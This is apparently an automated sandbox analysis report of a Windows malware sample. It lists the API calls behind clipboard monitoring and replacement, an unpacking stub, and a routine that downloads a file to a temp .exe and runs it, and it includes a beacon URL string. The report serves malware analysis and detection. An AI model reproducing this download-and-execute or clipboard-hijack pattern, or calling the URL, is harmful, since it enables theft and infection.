65806->65833 65809 405849 Concurrency::details::_TaskCollection::_Alias Concurrency::details::LockQueueNode::DerefTimerNode 65809->65785 65857 40fde6 65812->65857 65814 4016eb Sleep 65858 40cc10 65814->65858 65817 40cc10 28 API calls 65818 401711 65817->65818 65819 40171b OpenClipboard 65818->65819 65820 401943 Sleep 65819->65820 65821 40172b GetClipboardData 65819->65821 65820->65819 65822 40173b GlobalLock 65821->65822 65823 40193d CloseClipboard 65821->65823 65822->65823 65827 401748 _strlen 65822->65827 65823->65820 65824 40cc10 28 API calls 65824->65827 65826 4018d2 EmptyClipboard GlobalAlloc 65826->65827 65828 4018eb GlobalLock 65826->65828 65827->65823 65827->65824 65827->65826 65830 40cbc7 28 API calls std::system_error::system_error 65827->65830 65862 402e66 167 API calls 2 library calls 65827->65862 65864 40caa6 26 API calls _Deallocate 65827->65864 65863 426990 65828->65863 65830->65827 65832 401905 GlobalUnlock SetClipboardData GlobalFree 65832->65827 65834 402a27 InternetOpenUrlW 65833->65834 65835 402b9c 65833->65835 65834->65835 65836 402a3d GetTempPathW GetTempFileNameW 65834->65836 65838 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65835->65838 65870 42a88e 65836->65870 65840 402bab 65838->65840 65849 40e76b 65840->65849 65841 402b8b InternetCloseHandle InternetCloseHandle 65841->65835 65842 402aa8 Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65843 402ac0 InternetReadFile WriteFile 65842->65843 65844 402b00 CloseHandle 65842->65844 65843->65842 65872 402960 65844->65872 65847 402b2b ShellExecuteExW 65847->65841 65848 402b72 WaitForSingleObject CloseHandle 65847->65848 65848->65841 65983 40deea 65849->65983 65854 40e810 65854->65809 65855 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 65990 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 65855->65990 65856->65803 65857->65814 65859 40cc2c _strlen 65858->65859 65865 40cbc7 65859->65865 65861 401704 65861->65817 65862->65827 65863->65832 65864->65827 65866 40cbd6 BuildCatchObjectHelperInternal 65865->65866 65867 40cbfa 65865->65867 65866->65861 65867->65866 65869 40cb5c 28 API calls 4 library calls 65867->65869 65869->65866 65871 402a76 CreateFileW 65870->65871 65871->65841 65871->65842 65873 40298b _wcslen Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65872->65873 65882 42b454 65873->65882 65877 4029b8 65904 404333 65877->65904 65880 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65881 4029f2 65880->65881 65881->65841 65881->65847 65908 42b106 65882->65908 65885 402823 65886 402832 Concurrency::details::_TaskCollection::_Alias 65885->65886 65934 4032dd 65886->65934 65888 402846 65950 403b8b 65888->65950 65890 40285a 65891 402888 65890->65891 65892 40286c 65890->65892 65956 403112 65891->65956 65977 40329a 167 API calls 65892->65977 65895 402895 65959 403c20 65895->65959 65897 4028a7 65969 403cc2 65897->65969 65899 40287f std::ios_base::_Ios_base_dtor Concurrency::details::_TaskCollection::_Alias 65899->65877 65900 4028c4 65901 404333 26 API calls 65900->65901 65902 4028e3 65901->65902 65978 40329a 167 API calls 65902->65978 65905 4029e4 65904->65905 65906 40433b 65904->65906 65905->65880 65979 40cc96 65906->65979 65909 42b133 65908->65909 65910 42b142 65909->65910 65911 42b15a 65909->65911 65927 42b137 65909->65927 65912 42eac9 __Strcoll 20 API calls 65910->65912 65913 42a747 __fassign 162 API calls 65911->65913 65914 42b147 65912->65914 65916 42b165 65913->65916 65917 42a59d pre_c_initialization 26 API calls 65914->65917 65915 40f8cf Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 65918 4029a4 65915->65918 65919 42b170 65916->65919 65920 42b307 65916->65920 65917->65927 65918->65885 65923 42b218 WideCharToMultiByte 65919->65923 65929 42b1b5 WideCharToMultiByte 65919->65929 65930 42b17b 65919->65930 65921 42b334 WideCharToMultiByte 65920->65921 65922 42b312 65920->65922 65921->65922 65925 42eac9 __Strcoll 20 API calls 65922->65925 65922->65927 65926 42b243 65923->65926 65923->65930 65925->65927 65928 42b24c GetLastError 65926->65928 65926->65930 65927->65915 65928->65930 65933 42b25b 65928->65933 65929->65930 65930->65927 65931 42eac9 __Strcoll 20 API calls 65930->65931 65931->65927 65932 42b274 WideCharToMultiByte 65932->65922 65932->65933 65933->65922 65933->65927 65933->65932 65935 4032e9 Concurrency::details::_TaskCollection::_Alias 65934->65935 65936 40467c 167 API calls 65935->65936 65937 403315 65936->65937 65938 40484d 167 API calls 65937->65938 65939 40333e 65938->65939 65940 40458c 26 API calls 65939->65940 65941 40334d 65940->65941 65942 403392 std::ios_base::_Ios_base_dtor 65941->65942 65943 40dde3 167 API calls 65941->65943 65944 40c618 167 API calls 65942->65944 65945 4033ce Concurrency::details::_TaskCollection::_Alias 65942->65945 65946 403362 65943->65946 65944->65945 65945->65888 65946->65942 65947 40458c 26 API calls 65946->65947 65948 403373 65947->65948 65949 404c14 167 API calls 65948->65949 65949->65942 65951 403b97 Concurrency::details::_TaskCollection::_Alias 65950->65951 65952 4042af 167 API calls 65951->65952 65953 403ba3 65952->65953 65954 403bc7 Concurrency::details::_TaskCollection::_Alias 65953->65954 65955 4034fb 167 API calls 65953->65955 65954->65890 65955->65954 65957 404356 28 API calls 65956->65957 65958 40312c Concurrency::details::VirtualProcessor::ThrowVirtualProcessorEvent 65957->65958 65958->65895 65960 403c2c Concurrency::details::_TaskCollection::_Alias 65959->65960 65961 40c618 167 API calls 65960->65961 65962 403c4f 65961->65962 65963 4042af 167 API calls 65962->65963 65964 403c59 65963->65964 65965 403c9c Concurrency::details::_TaskCollection::_Alias 65964->65965 65968 4034fb 167 API calls 65964->65968 65965->65897 65966 403c7a 65966->65965 65967 4046ca 167 API calls 65966->65967 65967->65965 65968->65966 65970 403cce __EH_prolog3_catch 65969->65970 65971 4042af 167 API calls 65970->65971 65973 403ce7 65971->65973 65972 4046ca 167 API calls 65974 403d70 Concurrency::details::_TaskCollection::_Alias 65972->65974 65975 403d17 65973->65975 65976 40369f 40 API calls 65973->65976 65974->65900 65975->65972 65976->65975 65977->65899 65978->65899 65980 40cca3 65979->65980 65981 40ccb0 Concurrency::details::LockQueueNode::DerefTimerNode 65979->65981 65982 40cc72 _Deallocate 26 API calls 65980->65982 65981->65905 65982->65981 65991 40f22a EnterCriticalSection 65983->65991 65985 40def4 65986 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 65985->65986 65987 40ced2 65986->65987 65988 40cec7 CloseHandle 65986->65988 65989 40ced6 GetCurrentThreadId 65987->65989 65988->65989 65989->65855 65990->65854 65991->65985 66001 431f5e GetLastError 65992->66001 65994 42e083 ExitThread 65995 42e0a1 65998 42e0b4 65995->65998 65999 42e0ad CloseHandle 65995->65999 65998->65994 66000 42e0c0 FreeLibraryAndExitThread 65998->66000 65999->65998 66002 431f7d 66001->66002 66003 431f77 66001->66003 66005 434d2a _Atexit 17 API calls 66002->66005 66007 431fd4 SetLastError 66002->66007 66021 435111 11 API calls 2 library calls 66003->66021 66006 431f8f 66005->66006 66008 431f97 66006->66008 66022 435167 11 API calls 2 library calls 66006->66022 66010 42e07f 66007->66010 66012 43346a _free 17 API calls 66008->66012 66010->65994 66010->65995 66020 4354f6 10 API calls 2 library calls 66010->66020 66011 431fac 66011->66008 66014 431fb3 66011->66014 66013 431f9d 66012->66013 66015 431fcb SetLastError 66013->66015 66023 431d4c 20 API calls _Atexit 66014->66023 66015->66010 66017 431fbe 66018 43346a _free 17 API calls 66017->66018 66019 431fc4 66018->66019 66019->66007 66019->66015 66020->65995 66021->66002 66022->66011 66023->66017 66024->65670 66025 40239e 66026 402561 PostQuitMessage 66025->66026 66027 4023b2 66025->66027 66028 40255f 66026->66028 66029 4023b9 DefWindowProcW 66027->66029 66030 4023d0 66027->66030 66029->66028 66030->66028 66031 4029f4 167 API calls 66030->66031 66031->66028

                                                    Executed Functions

                                                    Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                    • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                      • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                    • OpenClipboard.USER32(00000000), ref: 0040171D
                                                    • GetClipboardData.USER32(00000001), ref: 0040172D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                    • _strlen.LIBCMT ref: 00401749
                                                    • _strlen.LIBCMT ref: 00401778
                                                    • _strlen.LIBCMT ref: 004018BC
                                                    • EmptyClipboard.USER32 ref: 004018D2
                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                    • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                    • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                    • CloseClipboard.USER32 ref: 0040193D
                                                    • Sleep.KERNEL32(000002D2), ref: 00401948
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                    • String ID: i
                                                    • API String ID: 1583243082-3865851505
                                                    • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                    • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                    • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                    • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D
                                                    Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                    • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                    • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                    • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                    • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                    • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                    • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                    • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                    • CloseHandle.KERNEL32(?), ref: 00402B89
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                    • String ID: .exe$<$ShareScreen
                                                    • API String ID: 3323492106-493228180
                                                    • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                    • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                    • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                    • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                    Function 00AF9FB6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00AF9FDE
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 00AF9FFE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902949566.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_af9000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: 03b362eaa5bc82ebe12e820efe5214a138a326eb4c9564ae3ea1b45e7aa5df77
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: 9FF04932600719ABD7202BE9A98DBBBB6E8AF59725F100629F747D1480DA70E8458A61
                                                    Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 94 43d35e-43d364 83->94 84->83 92 43d162-43d16b GetFileType 85->92 93 43d0f7-43d100 85->93 99 43d1b4-43d1b7 92->99 100 43d16d-43d19e GetLastError call 42ea93 CloseHandle 92->100 97 43d102-43d106 93->97 98 43d137-43d15d GetLastError call 42ea93 93->98 97->98 103 43d108-43d135 call 43cd0a 97->103 98->83 101 43d1c0-43d1c6 99->101 102 43d1b9-43d1be 99->102 100->83 111 43d1a4-43d1af call 42eac9 100->111 106 43d1ca-43d218 call 4396c7 101->106 107 43d1c8 101->107 102->106 103->92 103->98 117 43d21a-43d226 call 43cf1b 106->117 118 43d228-43d24c call 43cabd 106->118 107->106 111->83 117->118 125 43d250-43d25a call 4335cd 117->125 123 43d25f-43d2a2 118->123 124 43d24e 118->124 127 43d2c3-43d2d1 123->127 128 43d2a4-43d2a8 123->128 124->125 125->94 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->94 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                    APIs
                                                      • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                    • GetLastError.KERNEL32 ref: 0043D150
                                                    • __dosmaperr.LIBCMT ref: 0043D157
                                                    • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                    • GetLastError.KERNEL32 ref: 0043D16D
                                                    • __dosmaperr.LIBCMT ref: 0043D176
                                                    • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                    • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                    • GetLastError.KERNEL32 ref: 0043D312
                                                    • __dosmaperr.LIBCMT ref: 0043D319
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                    • String ID: H
                                                    • API String ID: 4237864984-2852464175
                                                    • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                    • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                    • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                    • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A
                                                    Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 160 4332d5 144->160 146->147 150 432f67-432f92 146->150 166 4332d0 call 42a59d 147->166 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->166 158 432fc3-432fc7 157->158 159 4332b9-4332bb 157->159 158->159 164 432fcd-432fd1 158->164 165 4332d8-4332dd 159->165 160->165 164->156 168 432fd3-432fea 164->168 166->160 171 433007-433010 168->171 172 432fec-432fef 168->172 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->175 176 43302e-433038 171->176 173 432ff1-432ff7 172->173 174 432ff9-433002 172->174 173->174 173->175 179 4330a3-4330bd 174->179 204 4331f0 175->204 177 43303a-43303c 176->177 178 43303f-43305d call 4336a7 call 43346a * 2 176->178 177->178 213 43307a-4330a0 call 4347ee 178->213 214 43305f-433075 call 42eac9 call 42eab6 178->214 181 4330c3-4330d3 179->181 182 433191-43319a call 43d365 179->182 181->182 185 4330d9-4330db 181->185 193 43320d 182->193 194 43319c-4331ae 182->194 185->182 189 4330e1-433107 185->189 189->182 196 43310d-433120 189->196 202 433211-433229 ReadFile 193->202 194->193 198 4331b0-4331bf GetConsoleMode 194->198 196->182 200 433122-433124 196->200 198->193 203 4331c1-4331c5 198->203 200->182 205 433126-433151 200->205 207 433285-433290 GetLastError 202->207 208 43322b-433231 202->208 203->202 210 4331c7-4331e1 ReadConsoleW 203->210 211 4331f3-4331fd call 43346a 204->211 205->182 212 433153-433166 205->212 215 433292-4332a4 call 42eac9 call 42eab6 207->215 216 4332a9-4332ac 207->216 208->207 209 433233 208->209 218 433236-433248 209->218 220 4331e3 GetLastError 210->220 221 433202-43320b 210->221 211->165 212->182 225 433168-43316a 212->225 213->179 214->204 215->204 222 4332b2-4332b4 216->222 223 4331e9-4331ef call 42ea93 216->223 218->211 228 43324a-43324e 218->228 220->223 221->218 222->211 223->204 225->182 232 43316c-43318c 225->232 235 433250-433260 call 432c45 228->235 236 433267-433272 228->236 232->182 247 433263-433265 235->247 241 433274 call 432d95 236->241 242 43327e-433283 call 432a85 236->242 248 433279-43327c 241->248 242->248 247->211 248->247
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                    • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                    • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                    • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69
                                                    Function 024F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 250 24f003c-24f0047 251 24f004c-24f0263 call 24f0a3f call 24f0e0f call 24f0d90 VirtualAlloc 250->251 252 24f0049 250->252 267 24f028b-24f0292 251->267 268 24f0265-24f0289 call 24f0a69 251->268 252->251 269 24f02a1-24f02b0 267->269 272 24f02ce-24f03c2 VirtualProtect call 24f0cce call 24f0ce7 268->272 269->272 273 24f02b2-24f02cc 269->273 279 24f03d1-24f03e0 272->279 273->269 280 24f0439-24f04b8 VirtualFree 279->280 281 24f03e2-24f0437 call 24f0ce7 279->281 282 24f04be-24f04cd 280->282 283 24f05f4-24f05fe 280->283 281->279 285 24f04d3-24f04dd 282->285 286 24f077f-24f0789 283->286 287 24f0604-24f060d 283->287 285->283 291 24f04e3-24f0505 LoadLibraryA 285->291 289 24f078b-24f07a3 286->289 290 24f07a6-24f07b0 286->290 287->286 292 24f0613-24f0637 287->292 289->290 294 24f086e-24f08be LoadLibraryA 290->294 295 24f07b6-24f07cb 290->295 296 24f0517-24f0520 291->296 297 24f0507-24f0515 291->297 298 24f063e-24f0648 292->298 302 24f08c7-24f08f9 294->302 299 24f07d2-24f07d5 295->299 300 24f0526-24f0547 296->300 297->300 298->286 301 24f064e-24f065a 298->301 303 24f07d7-24f07e0 299->303 304 24f0824-24f0833 299->304 305 24f054d-24f0550 300->305 301->286 306 24f0660-24f066a 301->306 307 24f08fb-24f0901 302->307 308 24f0902-24f091d 302->308 309 24f07e4-24f0822 303->309 310 24f07e2 303->310 314 24f0839-24f083c 304->314 311 24f0556-24f056b 305->311 312 24f05e0-24f05ef 305->312 313 24f067a-24f0689 306->313 307->308 309->299 310->304 315 24f056f-24f057a 311->315 316 24f056d 311->316 312->285 317 24f068f-24f06b2 313->317 318 24f0750-24f077a 313->318 314->294 319 24f083e-24f0847 314->319 321 24f057c-24f0599 315->321 322 24f059b-24f05bb 315->322 316->312 323 24f06ef-24f06fc 317->323 324 24f06b4-24f06ed 317->324 318->298 325 24f084b-24f086c 319->325 326 24f0849 319->326 333 24f05bd-24f05db 321->333 322->333 327 24f06fe-24f0748 323->327 328 24f074b 323->328 324->323 325->314 326->294 327->328 328->313 333->305
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024F024D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3903711683.00000000024F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_24f0000_ssB9bjDQPf.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: cess$kernel32.dll
                                                    • API String ID: 4275171209-1230238691
                                                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction ID: fbf06393b412c87a3d50d88f0dbf1f48102c0f1d04f45ddb18649da5986a0ba6
                                                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                    • Instruction Fuzzy Hash: 3E526D74A01229DFDBA4CF58C984BADBBB1BF49304F1480DAE54DA7356DB30AA85CF14
                                                    Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180networkCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                    • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Internet$CloseHandleOpen_wcslen
                                                    • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                    • API String ID: 3067768807-1501832161
                                                    • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                    • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                    • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                    • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E
                                                    Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                    • String ID:
                                                    • API String ID: 1687354797-0
                                                    • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                    • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                    • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9
                                                    Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                    • __Cnd_signal.LIBCPMT ref: 00405828
                                                    • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                    • String ID:
                                                    • API String ID: 2059591211-0
                                                    • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                    • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                    • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                    • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D
                                                    Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                    • ExitThread.KERNEL32 ref: 0042DFDA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.3902330915.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ssB9bjDQPf.jbxd
                                                    Similarity
                                                    • API ID: ErrorExitLastThread
                                                    • String ID: F(@
                                                    • API String ID: 1611280651-2698495834
                                                    • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                    • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                    • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                    • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C
                                                    Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 529 42e114-42e11f 530 42e121-42e133 call 42eac9 call 42a59d 529->530 531 42e135-42e148 call 42e0cb 529->531 545 42e185-42e188 530->545 537 42e176 531->537 538 42e14a-42e167 CreateThread 531->538 542 42e178-42e184 call 42e03d 537->542 540 42e189-42e18e 538->540 541 42e169-42e175 GetLastError call 42ea93 538->541 543 42e190-42e193 540->543 544 42e195-42e197 540->544 541->537 542->545 543->544 544->542
                                                    APIs
                                                    • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
